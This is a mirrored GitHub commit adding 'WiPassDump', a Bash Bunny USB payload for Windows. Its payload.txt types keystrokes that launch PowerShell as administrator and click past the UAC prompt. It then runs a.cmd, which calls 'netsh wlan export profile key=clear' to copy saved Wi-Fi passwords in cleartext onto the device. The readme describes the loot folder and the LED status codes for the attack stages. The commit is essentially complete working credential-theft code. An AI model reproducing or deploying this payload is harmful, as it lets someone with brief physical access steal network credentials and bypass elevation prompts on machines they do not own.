mirror of
https://github.com/hak5darren/bashbunny-payloads.git
synced 2025-10-29 16:58:12 +00:00
WiPassDump
Runs powershell as Administrator, bypasses UAC and dumps cleartext Wi-Fi passwords and infos to the Bash Bunny.
This commit is contained in:
samdeg555
GitHub
parent
5453f32a6c
commit
c103288320
6
payloads/library/WiPassDump/a.cmd
Normal file
6
payloads/library/WiPassDump/a.cmd
Normal file
@ -0,0 +1,6 @@
|
|||||||
|
REM Go to dump directory
|
||||||
|
cd /d %~dp0
|
||||||
|
cd ../../loot/WiPassDump/
|
||||||
|
|
||||||
|
REM Dump saved Wi-Fi infos
|
||||||
|
netsh wlan export profile key=clear
|
||||||
55
payloads/library/WiPassDump/payload.txt
Normal file
55
payloads/library/WiPassDump/payload.txt
Normal file
@ -0,0 +1,55 @@
|
|||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: WiPassDump
|
||||||
|
# Author: Dax
|
||||||
|
# Version: 1.0
|
||||||
|
# Target: Windows
|
||||||
|
#
|
||||||
|
# Runs powershell as Administrator
|
||||||
|
# Bypasses UAC
|
||||||
|
# Dumps cleartext Wi-Fi passwords and infos to the Bash Bunny
|
||||||
|
#
|
||||||
|
|
||||||
|
LED R 200
|
||||||
|
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
|
||||||
|
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
|
||||||
|
source bunny_helpers.sh
|
||||||
|
|
||||||
|
# Set language accordingly
|
||||||
|
Q SET_LANGUAGE ca
|
||||||
|
|
||||||
|
# Create directory to dump infos
|
||||||
|
mkdir -p /root/udisk/loot/WiPassDump
|
||||||
|
|
||||||
|
LED B 200
|
||||||
|
|
||||||
|
# Launch powershell as admin
|
||||||
|
Q GUI r
|
||||||
|
Q DELAY 100
|
||||||
|
Q STRING powershell Start-Process powershell -Verb runAs
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
# Bypass UAC
|
||||||
|
Q DELAY 3000
|
||||||
|
Q ALT o
|
||||||
|
Q ENTER
|
||||||
|
Q DELAY 500
|
||||||
|
|
||||||
|
# Start a.cmd
|
||||||
|
Q STRING '.((gwmi win32_volume -f '"'"'label='"''"'BashBunny'"'''"').Name+'"'"'payloads/'
|
||||||
|
Q STRING $SWITCH_POSITION
|
||||||
|
Q STRING '/a.cmd'"'"')'
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
# Wait for a.cmd to finish and exit
|
||||||
|
Q DELAY 3000
|
||||||
|
Q STRING exit
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
|
LED R B 500
|
||||||
|
sync
|
||||||
|
ATTACKMODE STORAGE
|
||||||
|
|
||||||
|
LED G
|
||||||
26
payloads/library/WiPassDump/readme.md
Normal file
26
payloads/library/WiPassDump/readme.md
Normal file
@ -0,0 +1,26 @@
|
|||||||
|
# WiPassDump for Bash Bunnys
|
||||||
|
|
||||||
|
* Author: Dax
|
||||||
|
* Version: Version 1.0
|
||||||
|
* Target: Windows
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
Dumps saved Wi-Fi infos including clear text passwords to the bash bunny
|
||||||
|
Saves to the loot folder on the Bash Bunny USB Mass Storage partition in WiPassDump folder.
|
||||||
|
|
||||||
|
## Configuration
|
||||||
|
|
||||||
|
None needed.
|
||||||
|
|
||||||
|
## STATUS
|
||||||
|
|
||||||
|
| LED | Status |
|
||||||
|
| ------------------ | -------------------------------------------- |
|
||||||
|
| Red (blinking) | Setting up |
|
||||||
|
| Blue (blinking) | Attack running |
|
||||||
|
| Purple (blinking) | Almost done (cleaning up) |
|
||||||
|
| Green | Attack Complete |
|
||||||
|
|
||||||
|
## Discussion
|
||||||
|
None yet.
|
||||||
Loading…
x
Reference in New Issue
Block a user